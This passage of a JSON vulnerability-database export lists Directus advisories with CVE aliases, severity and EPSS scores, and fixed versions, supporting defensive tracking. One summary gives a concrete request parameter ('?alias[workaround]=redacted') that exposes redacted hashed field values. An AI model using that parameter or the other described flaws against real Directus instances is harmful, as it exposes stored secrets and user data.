CVE-2025-53887","GHSA-rmjh-cf9q-pv7q"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rren-vtar-23fm"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/49725?format=json","vulnerability_id":"VCID-s39d-aw92-hydh","summary":"Directus is a real-time API and App dashboard for managing SQL database content. A user with permission to view any collection using redacted hashed fields can get access the raw stored version using the `alias` functionality on the API. Normally, these redacted fields will return `**********` however  if we change the request to `?alias[workaround]=redacted` we can instead retrieve the plain text value for the field. This can be avoided by removing permission to view the sensitive fields entirely from users or roles that should not be able to see them. This vulnerability is fixed in 10.11.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-34708","reference_id":"","reference_type":"","scores":[{"value":"0.00324","scoring_system":"epss","scoring_elements":"0.55942","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00324","scoring_system":"epss","scoring_elements":"0.55821","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-34708"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-34708","reference_id":"CVE-2024-34708","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-34708"},{"reference_url":"https://github.com/directus/directus/commit/e70a90c267bea695afce6545174c2b77517d617b","reference_id":"e70a90c267bea695afce6545174c2b77517d617b","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-05-15T15:21:26Z/"}],"url":"https://github.com/directus/directus/commit/e70a90c267bea695afce6545174c2b77517d617b"},{"reference_url":"https://github.com/advisories/GHSA-p8v3-m643-4xqx","reference_id":"GHSA-p8v3-m643-4xqx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-p8v3-m643-4xqx"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-p8v3-m643-4xqx","reference_id":"GHSA-p8v3-m643-4xqx","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-05-15T15:21:26Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-p8v3-m643-4xqx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/31010?format=json","purl":"pkg:npm/directus@10.11.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-3u2p-nh39-5qag"},{"vulnerability":"VCID-45yr-y58u-aqb8"},{"vulnerability":"VCID-4z1u-rtza-83bj"},{"vulnerability":"VCID-54ja-4vrx-tbgm"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-8q3p-rrv2-jba5"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-jtg3-4cp8-8fe6"},{"vulnerability":"VCID-pvfa-xp3e-8kg2"},{"vulnerability":"VCID-qeh1-cm33-93g1"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-qrf3-cz1h-8kau"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-t1by-h5au-rqbu"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ua8h-tmak-hufd"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.11.0"}],"aliases":["CVE-2024-34708","GHSA-p8v3-m643-4xqx"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-s39d-aw92-hydh"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90555?format=json","vulnerability_id":"VCID-tp8r-hnf7-fkaf","summary":"Directus is a real-time API and App dashboard for managing SQL database content. An observable difference in error messaging was found in the Directus REST API in versions of Directus prior to version 11.13.0. The `/items/{collection}` API returns different error messages for two cases: when a user tries to access an existing collection which they are not authorized to access, and when user tries to access a non-existing collection. The two differing error messages leak the existence of collections to users which are not authorized to access these collections. Version 11.13.0 fixes the issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-64749","reference_id":"","reference_type":"","scores":[{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.15744","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00049","scoring_system":"epss","scoring_elements":"0.15606","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-64749"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64749","reference_id":"CVE-2025-64749","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-64749"},{"reference_url":"https://github.com/directus/directus/commit/f99c9b89071f9d136cc9b0d0c182f2d24542bc31","reference_id":"f99c9b89071f9d136cc9b0d0c182f2d24542bc31","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-14T17:14:48Z/"}],"url":"https://github.com/directus/directus/commit/f99c9b89071f9d136cc9b0d0c182f2d24542bc31"},{"reference_url":"https://github.com/advisories/GHSA-cph6-524f-3hgr","reference_id":"GHSA-cph6-524f-3hgr","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cph6-524f-3hgr"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-cph6-524f-3hgr","reference_id":"GHSA-cph6-524f-3hgr","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-14T17:14:48Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-cph6-524f-3hgr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/35193?format=json","purl":"pkg:npm/directus@11.13.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.13.0"}],"aliases":["CVE-2025-64749","GHSA-cph6-524f-3hgr"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-tp8r-hnf7-fkaf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/145868?format=json","vulnerability_id":"VCID-u121-7x5t-3fcg","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Instances relying on an allow-listed reset URL are vulnerable to an HTML injection attack through the use of query parameters in the reset URL. An attacker could exploit this to email users urls to the servers domain but which may contain malicious code. The problem has been resolved and released under version 9.23.0. People relying on a custom password reset URL should upgrade to 9.23.0 or later, or remove the custom reset url from the configured allow list. Users are advised to upgrade. Users unable to upgrade may disable the custom reset URL allow list as a workaround.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-27474","reference_id":"","reference_type":"","scores":[{"value":"0.00828","scoring_system":"epss","scoring_elements":"0.75025","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00828","scoring_system":"epss","scoring_elements":"0.74955","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-27474"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-27474","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-27474"},{"reference_url":"https://github.com/directus/directus/issues/17119","reference_id":"17119","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:29:56Z/"}],"url":"https://github.com/directus/directus/issues/17119"},{"reference_url":"https://github.com/directus/directus/pull/17120","reference_id":"17120","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:29:56Z/"}],"url":"https://github.com/directus/directus/pull/17120"},{"reference_url":"https://github.com/advisories/GHSA-4hmq-ggrm-qfc6","reference_id":"GHSA-4hmq-ggrm-qfc6","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4hmq-ggrm-qfc6"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-4hmq-ggrm-qfc6","reference_id":"GHSA-4hmq-ggrm-qfc6","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"},{"value":"8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-02-25T14:29:56Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-4hmq-ggrm-qfc6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/32456?format=json","purl":"pkg:npm/directus@9.23.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-f3pv-2cf5-3bg8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.0"},{"url":"http://public2.vulnerablecode.io/api/packages/393033?format=json","purl":"pkg:npm/directus@9.23.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-45yr-y58u-aqb8"},{"vulnerability":"VCID-4z1u-rtza-83bj"},{"vulnerability":"VCID-54ja-4vrx-tbgm"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-b8ya-2bmn-e3h5"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-eyv5-91cq-pyf9"},{"vulnerability":"VCID-f3pv-2cf5-3bg8"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-jvtg-cnnb-7ubg"},{"vulnerability":"VCID-jy2x-jbbb-zua5"},{"vulnerability":"VCID-pvfa-xp3e-8kg2"},{"vulnerability":"VCID-qeh1-cm33-93g1"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-qrf3-cz1h-8kau"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-s39d-aw92-hydh"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-t1by-h5au-rqbu"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u4er-eddz-g7aq"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ua8h-tmak-hufd"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v2je-s9mk-e3h1"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.1"}],"aliases":["CVE-2023-27474","GHSA-4hmq-ggrm-qfc6"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-u121-7x5t-3fcg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/55644?format=json","vulnerability_id":"VCID-u4er-eddz-g7aq","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 10.8.3, the exact Directus version number was being shipped in compiled JS bundles which are accessible without authentication. With this information a malicious attacker can trivially look for known vulnerabilities in Directus core or any of its shipped dependencies in that specific running version. The problem has been resolved in versions 10.8.3 and newer.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-27296","reference_id":"","reference_type":"","scores":[{"value":"0.00437","scoring_system":"epss","scoring_elements":"0.63623","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00437","scoring_system":"epss","scoring_elements":"0.63521","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-27296"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://github.com/directus/directus/commit/a5a1c26ac48795ed3212a4c51b9523588aff4fa0","reference_id":"a5a1c26ac48795ed3212a4c51b9523588aff4fa0","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-03-01T19:28:33Z/"}],"url":"https://github.com/directus/directus/commit/a5a1c26ac48795ed3212a4c51b9523588aff4fa0"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-27296","reference_id":"CVE-2024-27296","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-27296"},{"reference_url":"https://github.com/advisories/GHSA-5mhg-wv8w-p59j","reference_id":"GHSA-5mhg-wv8w-p59j","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5mhg-wv8w-p59j"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-5mhg-wv8w-p59j","reference_id":"GHSA-5mhg-wv8w-p59j","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-03-01T19:28:33Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-5mhg-wv8w-p59j"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/29477?format=json","purl":"pkg:npm/directus@10.8.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-45yr-y58u-aqb8"},{"vulnerability":"VCID-4z1u-rtza-83bj"},{"vulnerability":"VCID-54ja-4vrx-tbgm"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-8q3p-rrv2-jba5"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-jy2x-jbbb-zua5"},{"vulnerability":"VCID-pvfa-xp3e-8kg2"},{"vulnerability":"VCID-qeh1-cm33-93g1"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-qrf3-cz1h-8kau"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-s39d-aw92-hydh"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-t1by-h5au-rqbu"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ua8h-tmak-hufd"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v2je-s9mk-e3h1"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.8.3"}],"aliases":["CVE-2024-27296","GHSA-5mhg-wv8w-p59j"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-u4er-eddz-g7aq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/71570?format=json","vulnerability_id":"VCID-u5hw-p46t-jybc","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.16.1, Directus' TUS resumable upload endpoint (/files/tus) allows any authenticated user with basic file upload permissions to overwrite arbitrary existing files by UUID. The TUS controller performs only collection-level authorization checks, verifying the user has some permission on directus_files, but never validates item-level access to the specific file being replaced. As a result, row-level permission rules (e.g., \"users can only update their own files\") are completely bypassed via the TUS path while being correctly enforced on the standard REST upload path. This vulnerability is fixed in 11.16.1.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35412","reference_id":"","reference_type":"","scores":[{"value":"0.00013","scoring_system":"epss","scoring_elements":"0.02424","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00013","scoring_system":"epss","scoring_elements":"0.02422","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35412"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35412","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35412"},{"reference_url":"https://github.com/advisories/GHSA-qqmv-5p3g-px89","reference_id":"GHSA-qqmv-5p3g-px89","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qqmv-5p3g-px89"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-qqmv-5p3g-px89","reference_id":"GHSA-qqmv-5p3g-px89","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-07T16:23:08Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-qqmv-5p3g-px89"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373399?format=json","purl":"pkg:npm/directus@11.16.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.16.1"}],"aliases":["CVE-2026-35412","GHSA-qqmv-5p3g-px89"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-u5hw-p46t-jybc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/212209?format=json","vulnerability_id":"VCID-ua8h-tmak-hufd","summary":"Duplicate Advisory: Improper access control in Directus","references":[{"reference_url":"https://directus.io","reference_id":"","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://directus.io"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-6534","reference_id":"CVE-2024-6534","reference_type":"","scores":[{"value":"4.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-6534"},{"reference_url":"https://github.com/advisories/GHSA-q83v-hq3j-4pq3","reference_id":"GHSA-q83v-hq3j-4pq3","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-q83v-hq3j-4pq3"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/33132?format=json","purl":"pkg:npm/directus@10.13.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-3u2p-nh39-5qag"},{"vulnerability":"VCID-45yr-y58u-aqb8"},{"vulnerability":"VCID-4z1u-rtza-83bj"},{"vulnerability":"VCID-54ja-4vrx-tbgm"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-8q3p-rrv2-jba5"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h